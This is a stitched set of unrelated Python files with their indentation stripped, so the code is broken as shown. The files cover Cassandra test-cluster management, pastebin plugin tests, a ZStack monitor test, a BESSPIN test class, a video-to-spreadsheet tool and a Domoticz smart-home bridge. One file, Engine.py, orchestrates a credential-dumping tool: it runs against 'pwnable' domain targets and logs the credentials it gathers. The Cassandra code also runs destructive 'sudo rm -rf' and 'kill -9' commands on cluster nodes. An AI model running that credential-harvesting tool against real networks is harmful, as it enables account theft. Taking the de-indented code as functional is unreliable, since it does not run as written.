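#   result, success = db.query("SELECT count(*) FROM ks1.table1", no_pause=True)
#
# A trailing ';' is appended automatically, failed queries are retried on the
# back-off schedule in wait_times, and no_pause=True skips the interactive
# prompts on failure.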
def insert(self, mgmt_object, schema_file, record_size, start_record, record_count, uuid4=None, suppress_reporting=False, cluster=None):
"""
Does batch inserts into db from geppetto node.
"""
if not cluster:
cluster = CassandraTestingCluster(self.ips, self.db_user, self.db_pass)
if not cluster.connect():
report('ERROR: cannot connect to Cassandra cluster', 'critical')
sys.exit(-1)
if uuid4:
if not suppress_reporting: report('%s do_insert(%s, %s, %s, %s, %s, %s, %s)' % (self.name, 'cluster', mgmt_object, schema_file, record_size, start_record, record_count, uuid4))
do_insert(cluster, mgmt_object, schema_file, record_size, start_record, record_count, uuid4, suppress_output=suppress_reporting)
else:
if not suppress_reporting: report('%s do_insert(%s, %s, %s, %s, %s, %s)' % (self.name, 'cluster', mgmt_object, schema_file, record_size, start_record, record_count))
do_insert(cluster, mgmt_object, schema_file, record_size, start_record, record_count, suppress_output=suppress_reporting)
if not cluster:
cluster.disconnect()
def mass_population(self, schema_file='~/.geppetto/schema/schema1.txt', record_size=1024, start_record=1, record_count=50, mgmt_object='ks1.table1', replication=3, on_max_nodes=3, run_async=True):  # 'async' is a reserved word in Python 3.7+, so the flag is named run_async
"""
Sets mass population on the cassandra cluster. Runs a script on multiple nodes.
"""
if 'geppetto/schema' not in schema_file:
schema_file = '~/.geppetto/schema/cassandra/' + schema_file
if not self.payload:
self._deliver_payload()
# Need to start separate thread ...
self.do_mass_population = True
population_ips = self.ips[:on_max_nodes]
def mass_worker():
record_count_per_node = int(record_count / len(population_ips))
node_start_record = start_record
auth_string = ''
if self.db_user:
auth_string = '--db_user %s --db_pass %s' % (self.db_user, self.db_pass)
for ip in population_ips:
report('Setting mass population on cluster {%s} node {%s}.' % (self.name, ip), 'warning')
# Clean log first.
cmd = 'sudo rm /tmp/mass_population.log'
rpc(ip, cmd, self.username, self.password, self.key)
cmd = '(python ~/.geppetto/data_population.py ' \
'%s %s %s ' \
'insert ' \
'-r %s ' \
'-s %s ' \
'-n %s ' \
'-t %s ' \
'--replication %s ' \
') > /tmp/mass_population.log &' % \
(ip, schema_file, auth_string,
record_size,
node_start_record,
record_count_per_node,
mgmt_object,
replication)
node_start_record += record_count_per_node
rpc(ip, cmd, self.username, self.password, self.key, no_tty=True) # No tty so we can run as bg & disconnect.
if not run_async:
cmd = 'ps -ef | grep geppetto | grep -v grep | wc -l'
cmd2 = 'tail -1 /tmp/mass_population.log'
while True:
try:
report('Populating ...')
processes_running = 0
for ip in population_ips:
out, err = rpc(ip, cmd, self.username, self.password, self.key, suppress_output=True)
out2, err2 = rpc(ip, cmd2, self.username, self.password, self.key, suppress_output=True)
report('<%s> %s' % (ip, out2))
try:
processes_running += int(out)
except Exception as e:
report(e, 'critical')
raise
if processes_running == 0:
break
except Exception as e:
report(e, 'critical')
break
time.sleep(15)
mass_worker()
def delta_population(self, schema_file='~/.geppetto/schema/schema1.txt', record_size=1024, start_record=1, mgmt_object='ks1.table1', insert_percentage=70, bytes_per_hour=1, replication=3):
"""
Creates a delta population on the cassandra cluster. Runs a script on one cassandra node and checks status.
:param record_size: Record size.
:param start_record: Starting record number.
:param mgmt_object: keyspace.table format.
:param insert_percentage: Insert percentage.
:return:
"""
DELAY_MS = 1000
LOOP_MIN = 5 # Minimum of 1
if not self.payload:
self._deliver_payload()
workload_ip = self.ips[randint(0, len(self.ips) - 1)]
# Need to start separate thread ...
self.do_delta_population = True
# Do rate calculations.
records_per_hour = max(1, bytes_per_hour / record_size)
records_per_min = max(1, records_per_hour / 60)
records_per_interval = records_per_min * LOOP_MIN
# Batch calculations.
num_batches = max(60 * 1, 60 * (LOOP_MIN - 1)) # We keep an empty minute at the end for everything to complete and reduce stress on system.
batch_size = max(1, records_per_interval / num_batches)
# If we don't need that many batches, recalculate the num_batches and batch_size.
if records_per_interval < num_batches:
num_batches = records_per_interval # We know this should be done 1 minute before next loop.
batch_size = 1
# Build command to stop previous delta populations.
cmd1 = '''ps -ef | grep gepp | grep -v grep | grep %s | grep "\-b" | tr -s " " | cut -d" " -f2 | xargs kill''' % mgmt_object
auth_string = ''
if self.db_user:
auth_string = '--db_user %s --db_pass %s' % (self.db_user, self.db_pass)
cmd2 = '(python ~/.geppetto/data_population.py ' \
'%s %s %s ' \
'update ' \
'-r %s ' \
'-s %s ' \
'-t %s ' \
'-i %s ' \
'-b %s ' \
'-d %s ' \
'-c %s ' \
'--replication %s ' \
') > /tmp/delta_updater.log &' % \
(workload_ip, schema_file, auth_string,
record_size,
start_record,
mgmt_object,
insert_percentage,
batch_size,
DELAY_MS,
num_batches,
replication)
def delta_worker():
# Loop every 5 minutes and reinitialize delta.
while self.do_delta_population:
# Stop previous populations, in the case they are still going.
rpc(workload_ip, cmd1, self.username, self.password, self.key)
time.sleep(2)
# Start new batch of populations.
rpc(workload_ip, cmd2, self.username, self.password, self.key, no_tty=True) # No tty so we can run as bg & disconnect.
report('{%s} delta population set on node %s.' % (mgmt_object, workload_ip))
time.sleep(60 * LOOP_MIN) # Sleep LOOP_MIN min, allow delta to complete and settle, then cycle again. (A more dependable way)
t = threading.Thread(target=delta_worker)
t.setDaemon(True)
t.start()
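# Worked example of the rate/batch arithmetic above (illustrative numbers only,
# assuming Python 3 true division): with bytes_per_hour = 1024**3 (1 GiB/h) and
# record_size = 1024,
#   records_per_hour     = max(1, 1024**3 / 1024)      = 1048576
#   records_per_min      = max(1, 1048576 / 60)        ~ 17476.3
#   records_per_interval = records_per_min * LOOP_MIN  ~ 87381.3   (LOOP_MIN = 5)
#   num_batches          = 60 * (LOOP_MIN - 1)         = 240
#   batch_size           = max(1, 87381.3 / 240)       ~ 364.1
# With the default bytes_per_hour=1 everything collapses to the minimum of one
# record per batch.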
def stop_mass_population(self):
self.do_mass_population = False
cmd = '''ps -ef | grep -v grep | grep geppetto | awk '{print $2}' | xargs kill -9'''
for ip in self.ips:
rpc(ip, cmd, self.username, self.password, self.key)
def stop_delta_population(self):
self.do_delta_population = False
def stop_population(self):
"""
Stops both delta and mass population on this cluster.
"""
self.stop_mass_population()
self.stop_delta_population()
def clean(self):
"""
Caution! Empties database directories and commit logs for all nodes in db.
:return:
"""
report('Cleaning data and commitlog directories for cluster {%s}' % (self.name), 'warning')
cmd = 'sudo service cassandra stop'
for ip in self.ips:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(10)
cmd_list = [
'rm -f ~/.__jmxcmd*',
'sudo rm -rf %s/*' % self.data_dir,
'sudo rm -rf %s/*' % self.commitlog_dir,
'sudo service cassandra start',
]
for ip in self.ips[:1]:
for cmd in cmd_list:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(30)
for ip in self.ips[1:]:
for cmd in cmd_list:
rpc(ip, cmd, self.username, self.password, self.key)
time.sleep(30)
report('Status cluster {%s} \n %s' % (self.name, self.status()))
def remove(self, ks, table=None):
"""
Removes ks or table from db.
:param table: If provided, only drops this table from the given keyspace; otherwise drops the whole keyspace.
"""
if table:
# TODO: (Aaron) Fix check for if it exists.
# cql = "SELECT columnfamily_name FROM system.schema_columnfamilies WHERE keyspace_name = '%s' ;" % (ks)
# result, success = self.query(cql, no_pause=True)
# If the table does not exist yet short circuit, else we can continue to drop that table.
# if not table in str(result):
# return
cql = 'DROP TABLE %s.%s ;' % (ks, table)
else:
# TODO: (Aaron) Fix check for if it exists.
# Check to see if the KS exists, if so do nothing.
# cql = 'SELECT * FROM system.schema_keyspaces;' # Grab keyspaces.
# result, success = self.query(cql, no_pause=True)
# if not ks in str(result[0]):
# return
cql = 'DROP KEYSPACE %s ;' % ks
result, success = self.query(cql, no_pause=True)
return result, success
def set_compaction_strategy(self, strategy, ks, table):
"""
Sets the compaction strategy on a cassandra table for a given cluster.
:param strategy: Cassandra compaction strategy to use. Valid strategies are: 'STCS', 'DTCS', 'LCS'.
:param ks: Keyspace.
:param table: Table.
:return: None
"""
if strategy == 'STCS':
strategy = 'SizeTieredCompactionStrategy'
elif strategy == 'DTCS':
strategy = 'DateTieredCompactionStrategy'
elif strategy == 'LCS':
strategy = 'LeveledCompactionStrategy'
assert(strategy in ['SizeTieredCompactionStrategy', 'DateTieredCompactionStrategy', 'LeveledCompactionStrategy'])
cql = ''
if strategy == 'SizeTieredCompactionStrategy':
cql = "ALTER TABLE %s.%s WITH compaction = {'class' : 'SizeTieredCompactionStrategy', 'min_threshold' : 6 } ;" % (ks, table)
elif strategy == 'DateTieredCompactionStrategy':
cql = "ALTER TABLE %s.%s WITH compaction = {'class' : 'DateTieredCompactionStrategy' } ;" % (ks, table)
elif strategy == 'LeveledCompactionStrategy': # Explicit with this else.
cql = "ALTER TABLE %s.%s WITH compaction = { 'class' : 'LeveledCompactionStrategy' } ;" % (ks, table)
self.query(cql)
def get_compaction_history(self):
cmd = 'nodetool compactionhistory'
for ip in self.ips:
try:
out, err = rpc(ip, cmd, self.username, self.password, self.key)
return out
except:
pass
return ''
|
test_pastebin_plugin.py
|
import logging
import re
import socket
import threading
import time
import tkinter
import traceback
from http.client import RemoteDisconnected
import pytest
import requests
from pygments.lexers import PythonLexer, TextLexer, get_lexer_by_name
from porcupine import get_main_window, utils
from porcupine.plugins.pastebin import DPaste, SuccessDialog, Termbin
# utils.run_in_thread() can make tests fragile
@pytest.fixture
def dont_run_in_thread(monkeypatch):
def func(blocking_function, done_callback, check_interval_ms=69, daemon=True):
try:
result = blocking_function()
except Exception:
done_callback(False, traceback.format_exc())
else:
done_callback(True, result)
monkeypatch.setattr(utils, "run_in_thread", func)
@pytest.mark.pastebin_test
def test_dpaste_syntax_choices():
# download the json data representing valid syntax choices linked from dpaste docs
response = requests.get("https://dpaste.com/api/v2/syntax-choices/")
response.raise_for_status()
syntax_choices = response.json()
# These are wrong for whatever reason (different pygments versions?)
del syntax_choices["amdgpu"]
del syntax_choices["ansys"]
del syntax_choices["asc"]
del syntax_choices["cddl"]
del syntax_choices["futhark"]
del syntax_choices["gcode"]
del syntax_choices["graphviz"]
del syntax_choices["gsql"]
del syntax_choices["ipython2"]
del syntax_choices["ipython3"]
del syntax_choices["ipythonconsole"]
del syntax_choices["jslt"]
del syntax_choices["json-object"]
del syntax_choices["kuin"]
del syntax_choices["meson"]
del syntax_choices["nestedtext"]
del syntax_choices["nodejsrepl"]
del syntax_choices["omg-idl"]
del syntax_choices["output"]
del syntax_choices["procfile"]
del syntax_choices["smithy"]
del syntax_choices["teal"]
del syntax_choices["ti"]
del syntax_choices["wast"]
for syntax_choice in syntax_choices.keys():
assert syntax_choice == get_lexer_by_name(syntax_choice).aliases[0]
@pytest.mark.pastebin_test
@pytest.mark.parametrize("paste_class", [DPaste, Termbin])
def test_pastebin(paste_class):
some_code = "import foo as bar\nprint('baz')"
for lexer in [TextLexer, PythonLexer]:
url = paste_class().run(some_code, lexer)
assert isinstance(url, str)
response = requests.get(url)
response.raise_for_status()
if response.text.strip().startswith("<!DOCTYPE"):
# html and regexes ftw
assert some_code in re.sub(r"<.*?>", "", response.text).replace("&#39;", "'")
else:
# raw url
assert response.text.strip() == some_code.strip()
@pytest.mark.pastebin_test # TODO: switch to localhost HTTPS server?
def test_dpaste_canceling(monkeypatch):
monkeypatch.setattr("porcupine.plugins.pastebin.DPASTE_URL", "https://httpbin.org/delay/3")
paste = DPaste()
got_error = False
def thread_target():
nonlocal got_error
try:
paste.run("hello world", TextLexer)
except RemoteDisconnected: # the error that it raises when canceled
got_error = True
thread = threading.Thread(target=thread_target)
thread.start()
start = time.time()
time.sleep(1)
paste.cancel()
thread.join()
assert time.time() - start < 1.05
assert got_error
def test_success_dialog(mocker):
dialog = SuccessDialog("http://example.com/poop")
dialog.clipboard_append("this junk should be gone soon")
dialog.copy_to_clipboard()
assert dialog.clipboard_get() == "http://example.com/poop"
# make sure that webbrowser.open is called
mock = mocker.patch("porcupine.plugins.pastebin.webbrowser")
assert dialog.winfo_exists()
dialog.open_in_browser()
assert not dialog.winfo_exists()
mock.open.assert_called_once_with("http://example.com/poop")
dialog.destroy()
def test_lots_of_stuff_with_localhost_termbin(
filetab, monkeypatch, mocker, tabmanager, dont_run_in_thread
):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
with socket.socket() as termbin:
termbin.settimeout(5)
termbin.bind(("localhost", 0))
termbin.listen(1)
monkeypatch.setattr(
"porcupine.plugins.pastebin.TERMBIN_HOST_AND_PORT", termbin.getsockname()
)
thread_done = False
fake_wait_window_done = False
def fake_termbin():
with termbin.accept()[0] as sock:
assert sock.recv(1024) == b"hello world\n"
sock.sendall(b"http://example.com/\n\0")
nonlocal thread_done
thread_done = True
thread = threading.Thread(target=fake_termbin)
thread.start()
tabmanager.select(filetab)
filetab.textwidget.insert("end", "hello world\n")
def fake_wait_window(success_dialog):
assert success_dialog.title() == "Pasting Succeeded"
assert success_dialog.url == "http://example.com/"
success_dialog.destroy()
nonlocal fake_wait_window_done
fake_wait_window_done = True
monkeypatch.setattr(tkinter.Toplevel, "wait_window", fake_wait_window)
get_main_window().event_generate("<<Menubar:Pastebin/termbin.com>>")
thread.join()
get_main_window().update()
assert thread_done and fake_wait_window_done
def test_paste_error_handling(monkeypatch, caplog, mocker, tabmanager, filetab, dont_run_in_thread):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
monkeypatch.setattr("porcupine.plugins.pastebin.DPASTE_URL", "ThisIsNotValidUrlStart://wat")
mocker.patch("tkinter.messagebox.showerror")
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
tkinter.messagebox.showerror.assert_called_once_with(
"Pasting failed", "Check your internet connection or try a different pastebin."
)
def test_invalid_return(filetab, tabmanager, mocker, caplog, dont_run_in_thread):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
mocker.patch("tkinter.messagebox.showerror")
mocker.patch("porcupine.plugins.pastebin.DPaste.run").return_value = "lol"
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
tkinter.messagebox.showerror.assert_called_once_with(
"Pasting failed", "Instead of a valid URL, dpaste.com returned 'lol'."
)
assert caplog.record_tuples == [
(
"porcupine.plugins.pastebin",
logging.ERROR,
"pastebin 'dpaste.com' returned invalid url: 'lol'",
)
]
def test_pasting_selected_indented_code(
filetab, tabmanager, monkeypatch, mocker, dont_run_in_thread
):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
monkeypatch.setattr("tkinter.Toplevel.wait_window", tkinter.Toplevel.destroy)
mock_run = mocker.patch("porcupine.plugins.pastebin.DPaste.run")
mock_run.return_value = "https://foobar"
filetab.textwidget.insert(
"1.0",
"""\
if foo:
bar
if baz:
lol
""",
)
filetab.textwidget.tag_add("sel", "2.0", "5.0")
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
mock_run.assert_called_once_with("bar\nif baz:\n lol\n", PythonLexer)
def test_are_you_sure_dialog(filetab, tmp_path, wait_until, mocker, monkeypatch):
mock_run = mocker.patch("porcupine.plugins.pastebin.DPaste.run")
dialogs = []
monkeypatch.setattr("tkinter.Toplevel.wait_window", (lambda d: dialogs.append(d)))
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
filetab.save_as(tmp_path / "lolwat.py")
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
assert len(dialogs) == 2
assert dialogs[0].title() == "Pastebin this file"
assert dialogs[1].title() == "Pastebin lolwat.py"
assert (
dialogs[0].nametowidget("content.label1")["text"]
== "Do you want to send the content of this file to dpaste.com?"
)
assert (
dialogs[1].nametowidget("content.label1")["text"]
== "Do you want to send the content of lolwat.py to dpaste.com?"
)
for d in dialogs:
d.destroy()
assert mock_run.call_count == 0 # closing the window cancels pastebinning
|
5min_alert_host_disk_read_iops.py
|
'''
Test the monitor trigger on host disk read IOPS over five minutes.
@author: Songtao,Haochen
'''
import os
import test_stub
import random
import time
import threading
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.monitor_operations as mon_ops
def test():
global trigger
global media
global trigger_action
test_item = "host.disk.io"
resource_type="HostVO"
vm_monitor_item = test_stub.get_monitor_item(resource_type)
if test_item not in vm_monitor_item:
test_util.test_fail('%s is not available for monitor' % test_item)
hosts = res_ops.get_resource(res_ops.HOST)
host = hosts[0]
duration = 300
expression = "host.disk.io{type=\"iops\", direction=\"read\"} > 60.1"
monitor_trigger = mon_ops.create_monitor_trigger(host.uuid, duration, expression)
send_email = test_stub.create_email_media()
media = send_email.uuid
trigger_action_name = "trigger"+ ''.join(map(lambda xx:(hex(ord(xx))[2:]),os.urandom(8)))
trigger = monitor_trigger.uuid
receive_email = os.environ.get('receive_email')
monitor_trigger_action = mon_ops.create_email_monitor_trigger_action(trigger_action_name, send_email.uuid, trigger.split(), receive_email)
trigger_action = monitor_trigger_action.uuid
host.password = os.environ.get('hostPassword')
ssh_cmd = test_stub.ssh_cmd_line(host.managementIp, host.username, host.password, port=int(host.sshPort))
rw = 'read'
t = threading.Thread(target=test_stub.run_disk_load1,args=(ssh_cmd, rw,))
t.start()
time.sleep(360)
test_stub.kill(ssh_cmd)
status_problem, status_ok = test_stub.query_trigger_in_loop(trigger,80)
test_util.action_logger('Trigger old status: %s triggered. Trigger new status: %s recovered' % (status_problem, status_ok ))
if status_problem != 1 or status_ok != 1:
test_util.test_fail('%s Monitor Test failed, expected Problem or OK status not triggered' % test_item)
mail_list = test_stub.receive_email()
keywords = "fired"
mail_flag = test_stub.check_email(mail_list, keywords, trigger, host.uuid)
if mail_flag == 0:
test_util.test_fail('Failed to Get Target: %s for: %s Trigger Mail' % (host.uuid, test_item))
mon_ops.delete_monitor_trigger_action(trigger_action)
mon_ops.delete_monitor_trigger(trigger)
mon_ops.delete_email_media(media)
def error_cleanup():
global trigger
global media
global trigger_action
mon_ops.delete_monitor_trigger_action(trigger_action)
mon_ops.delete_monitor_trigger(trigger)
mon_ops.delete_email_media(media)
|
vulClassTester.py
|
#! /usr/bin/env python3
""" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
This file has the custom PPAC methods to run tests on qemu|fpga.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # """
import sys, os
from besspin.cwesEvaluation.compat import cwesEvaluationCompatibilityLayer
from besspin.cwesEvaluation.PPAC import cweTests
from importlib.machinery import SourceFileLoader
import threading
from besspin.base.utils.misc import *
class vulClassTester(cwesEvaluationCompatibilityLayer):
def __init__ (self,settings):
super().__init__(settings)
return
def executeTest (self,binTest):
testName = binTest.split('.')[0]
if (hasattr(cweTests,testName)):
outLog = getattr(getattr(cweTests,testName),testName)(self,binTest)
elif (isEnabled('pocExploitsMode')):
self.terminateAndExit('<pocExploitsMode> not implemented',
exitCode=EXIT.Implementation)
else:
self.terminateAndExit(f"Calling unknown method <{testName}>.",exitCode=EXIT.Dev_Bug)
outLog = ''
return outLog
def executeOnRoot (self,commands):
switchBack = not self.isCurrentUserRoot
if (switchBack): #only do this if user is not root
self.switchUser()
for command in commands:
self.runCommand (command)
if (switchBack):
self.switchUser()
return
def socketCloseAndCollect (self,xSocket):
def closeSocket (xSocket):
try:
xSocket.close()
except Exception as exc:
warnAndLog("Unable to close socket.\n",doPrint=False,exc=exc)
xThread = threading.Thread(target=closeSocket, args=(xSocket,))
xThread.daemon = True
try:
socketName = xSocket.getsockname()
except Exception as exc:
socketName = "UNKNOWN"
warnAndLog("Unable to get socket name when closing. Maybe it was already closed.\n",doPrint=False,exc=exc)
getSetting('trash').throwThread(xThread,f"closing socket <{socketName}>")
xThread.start()
return xThread
|
Engine.py
|
# coding: utf-8
# Author: Lyderic LEFEBVRE
# Twitter: @lydericlefebvre
# Mail: lylefebvre.infosec@gmail.com
# LinkedIn: https://www.linkedin.com/in/lydericlefebvre
# Imports
import logging, traceback
from core.User import *
from core.Resources import *
from core.Targets import *
from core.SprayLove import *
from core.Colors import *
from core.Utils import *
from multiprocessing import Process
def run(args):
jobs = []
user = User(args.domain, args.username, args.password)
local_ip = retrieveMyIP()
try:
targets = listPwnableTargets(args.targets, user)
logging.warning("%sLet's spray some love... Be patient." % (warningGre))
for target in targets:
jobs.append(Process(target=sprayLove, args=(user, target, local_ip, args.remove, args.method)))
jobs[-1].start()
joinThreads(jobs, args.wait)
logging.warning("\n%sCredentials logged into: %s" % (warningGre, os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), 'misc', 'results', 'creds.txt')))
except KeyboardInterrupt:
logging.warning("%sKeyboard interrupt. Exiting." % (warningRed))
except Exception as e:
logging.warning("%sA problem occurs. Err: %s" % (warningRed, red))
logging.debug("%s==== STACKTRACE ====" % (blue))
if logging.getLogger().getEffectiveLevel() <= 10: traceback.print_exc(file=sys.stdout)
logging.debug("%s==== STACKTRACE ====%s" % (blue, white))
finally:
exit_gracefully(jobs, 10)
|
main.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: Handsome Lu time:2020/4/30
import shutil
import os
import cv2
from glob import glob
from PIL import Image
from openpyxl import Workbook
from openpyxl import utils
from openpyxl.styles import PatternFill
from PyQt5.QtWidgets import QApplication, QMainWindow
import back
import threading
import sys
def color(value):
temp = []
temp.append(value[2])
temp.append(value[1])
temp.append(value[0])
digit = list(map(str, range(10))) + list("ABCDEF")
string = ''
for i in temp:
a1 = i // 16
a2 = i % 16
string += digit[a1] + digit[a2]
return string
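# Hedged example of color(): cv2 yields pixels as [B, G, R], and the function
# reorders them into an RRGGBB hex string for openpyxl (the sample values are
# assumptions):
#
#   color([255, 0, 0])    # pure blue in BGR  -> '0000FF'
#   color([0, 128, 255])  # orange-ish in BGR -> 'FF8000'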
def del_temp():
ls = ['temp', 'temp_']
for x in ls:
if os.path.exists(x):
shutil.rmtree(x)
else:
print(x + ' folder is already gone, nothing to delete.')
def save_jpg(path, timeF, n):  # video path, interval (in frames) between extracted images, downscale factor
cap = cv2.VideoCapture(path)
name = 0
i=0
if os.path.exists('temp_'):
pass
else:
os.makedirs('temp_')
while(cap.isOpened()):
i=i+1
ret, frame = cap.read()
if(i%timeF == 0):
if ret==True:
name += 1
cv2.imwrite('temp_/%03d.jpg'% name,frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
img_path = glob("temp_/*.jpg")
path_save = "temp/"
if os.path.exists('temp'):
pass
else:
os.makedirs('temp')
a = range(0, len(img_path))
i = 0
for file in img_path:
name = os.path.join(path_save, "%03d.jpg" % a[i])
im = Image.open(file)
z = im.size[0] / n
im.thumbnail((z, z))
im.save(name, 'JPEG')
i += 1
# Store all images in a single workbook. Known issue: the saved file is fairly large and may fail to open.
def jpg_wb(save_name):
wb = Workbook()
img_path = glob("temp/*.jpg")
name = 0
for file in img_path:
exec('sheet' + str(name) + '=wb.create_sheet(str(name))')
x = 1
img = cv2.imread(file)
for i in img:
exec('sheet' + str(name) + '.row_dimensions[x].height =20')
h = 1
for j in i:
exec('sheet' + str(name) + '.column_dimensions[utils.get_column_letter(h)].width =5')
fill = PatternFill("solid", fgColor=color(j))
exec('sheet' + str(name)+'.cell(row=x,column=h).fill=fill')
h += 1
x += 1
name += 1
# Save the workbook
ws = wb["Sheet"]
wb.remove(ws)
wb.save(save_name + '.xlsx')
# One workbook per image
def jpg_wb_2(save_name):
img_path = glob("temp/*.jpg")
if os.path.exists(save_name):
pass
else:
os.makedirs(save_name)
name = 0
for file in img_path:
name += 1
wb = Workbook()
sheet = wb.create_sheet('sheet')
x = 1
img = cv2.imread(file)
for i in img:
sheet.row_dimensions[x].height =20
h = 1
for j in i:
sheet.column_dimensions[utils.get_column_letter(h)].width =5
fill = PatternFill("solid", fgColor=color(j))
sheet.cell(row=x,column=h).fill=fill
h += 1
x += 1
# Save the workbook
ws = wb["Sheet"]
wb.remove(ws)
wb.save(save_name + '/%03d.xlsx'%name)
def work():
combobox = ui.comboBox.currentIndex()
In = ui.lineEdit.text()
Out = ui.lineEdit_2.text()
timeF = ui.spinBox_2.value()
Red = ui.spinBox.value()
del_temp()
save_jpg(In, timeF, Red)
if combobox == 0:
jpg_wb_2(Out)
elif combobox == 1:
jpg_wb(Out)
del_temp()
ui.pushButton.setDisabled(0)
ui.pushButton.setText('开始')  # 'Start'
def active():
t = threading.Thread(target=work)
ui.pushButton.setDisabled(1)
ui.pushButton.setText('等待')  # 'Waiting'
t.start()
if __name__ == '__main__':
app = QApplication(sys.argv)
MainWindow = QMainWindow()
ui = back.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
ui.pushButton.clicked.connect(active)
sys.exit(app.exec_())
|
smarthome.py
|
# -*- coding: utf-8 -*-
import hashlib
import os
import re
import subprocess
import sys
import threading
from collections.abc import Mapping
from itertools import product
from pid import PidFile
import requests
import trait
from auth import *
from const import (DOMOTICZ_TO_GOOGLE_TYPES, ERR_FUNCTION_NOT_SUPPORTED, ERR_PROTOCOL_ERROR, ERR_DEVICE_OFFLINE,
TEMPLATE, ERR_UNKNOWN_ERROR, ERR_CHALLENGE_NEEDED, DOMOTICZ_GET_ALL_DEVICES_URL, domains,
DOMOTICZ_GET_SETTINGS_URL, DOMOTICZ_GET_ONE_DEVICE_URL, DOMOTICZ_GET_SCENES_URL, CONFIGFILE, LOGFILE,
REQUEST_SYNC_BASE_URL, REPORT_STATE_BASE_URL, ATTRS_BRIGHTNESS, ATTRS_FANSPEED,
ATTRS_THERMSTATSETPOINT, ATTRS_COLOR_TEMP, ATTRS_PERCENTAGE, VERSION, DOMOTICZ_GET_VERSION)
from helpers import (configuration, readFile, saveFile, SmartHomeError, SmartHomeErrorNoChallenge, AogState, uptime,
getTunnelUrl, FILE_DIR, logger, ReportState, Auth, logfilepath)
DOMOTICZ_URL = configuration['Domoticz']['ip'] + ':' + configuration['Domoticz']['port']
CREDITS = (configuration['Domoticz']['username'], configuration['Domoticz']['password'])
if 'PidFile' in configuration:
pidfile = PidFile(pidname=configuration['PidFile'])
else:
pidfile = PidFile('dzga')
try:
logger.info("Connecting to Domoticz on %s" % DOMOTICZ_URL)
r = requests.get(
DOMOTICZ_URL + '/json.htm?type=command&param=addlogmessage&message=Connected to Google Assistant with DZGA v' + VERSION,
auth=CREDITS, timeout=(2, 5))
except Exception as e:
logger.error('Connection to Domoticz refused with error: %s' % e)
try:
import git
repo = git.Repo(FILE_DIR)
branch = repo.active_branch.name
except:
repo = None
branch = ''
ReportState = ReportState()
if not ReportState.enable_report_state():
logger.error("Service account key is not found. Report state will be unavailable")
def checkupdate():
if repo is not None and 'CheckForUpdates' in configuration and configuration['CheckForUpdates'] == True:
try:
r = requests.get(
'https://raw.githubusercontent.com/DewGew/Domoticz-Google-Assistant/' + branch + '/const.py')
response = r.text
if VERSION not in response:
update = 1
logger.info("========")
logger.info(" New version is availible on Github!")
else:
update = 0
return update
except Exception as e:
logger.error('Connection to Github refused! Check configuration.')
return 0
else:
return 0
update = checkupdate()
# Convert a Domoticz device type to a Google Assistant domain
def AogGetDomain(device):
if device["Type"] in ['Light/Switch', 'Lighting 1', 'Lighting 2', 'Lighting 5', 'RFY', 'Value']:
if device["SwitchType"] in ['Blinds', 'Blinds Inverted', 'Venetian Blinds EU', 'Venetian Blinds US',
'Blinds Percentage', 'Blinds Percentage Inverted']:
return domains['blinds']
elif 'Door Lock' == device["SwitchType"]:
return domains['lock']
elif 'Door Lock Inverted' == device["SwitchType"]:
return domains['lockinv']
elif "Door Contact" == device["SwitchType"]:
return domains['door']
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return domains['push']
elif 'Motion Sensor' == device["SwitchType"]:
return domains['sensor']
elif 'Selector' == device["SwitchType"]:
if device['Image'] == 'Fan':
return domains['fan']
else:
return domains['selector']
elif 'Smoke Detector' == device["SwitchType"]:
return domains['smokedetektor']
elif 'Camera_Stream' in configuration and True == device["UsedByCamera"] and True == \
configuration['Camera_Stream']['Enabled']:
return domains['camera']
elif device["Image"] == 'Generic':
return domains['switch']
elif device["Image"] in ['Media', 'TV']:
return domains['media']
elif device["Image"] == 'WallSocket':
return domains['outlet']
elif device["Image"] == 'Speaker':
return domains['speaker']
elif device["Image"] == 'Fan':
return domains['fan']
elif device["Image"] == 'Heating':
return domains['heater']
else:
return domains['light']
elif 'Blinds' == device["Type"]:
return domains['blinds']
elif 'Group' == device["Type"]:
return domains['group']
elif 'Scene' == device["Type"]:
return domains['scene']
elif device["Type"] in ['Temp', 'Temp + Humidity', 'Temp + Humidity + Baro']:
return domains['temperature']
elif 'Thermostat' == device['Type']:
return domains['thermostat']
elif 'Color Switch' == device["Type"]:
if "Dimmer" == device["SwitchType"]:
return domains['color']
elif "On/Off" == device["SwitchType"]:
logger.info('%s (Idx: %s) is a color switch. To get all functions, set this device as Dimmer in Domoticz', device["Name"], device[
"idx"])
return domains['light']
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return domains['push']
elif 'Security' == device["Type"]:
return domains['security']
return None
def getDesc(state):
if state.domain in [domains['scene'], domains['group']]:
if 'Scene_Config' in configuration and configuration['Scene_Config'] is not None:
desc = configuration['Scene_Config'].get(int(state.id), None)
return desc
elif 'Device_Config' in configuration and configuration['Device_Config'] is not None:
desc = configuration['Device_Config'].get(int(state.id), None)
return desc
else:
return None
def getDeviceConfig(descstr):
ISLIST = ['nicknames']
rawconfig = re.findall(r'<voicecontrol>(.*?)</voicecontrol>', descstr, re.DOTALL)
if len(rawconfig) > 0:
try:
lines = rawconfig[0].strip().splitlines()
cfgdict = {}
for l in lines:
assign = l.split('=')
varname = assign[0].strip().lower()
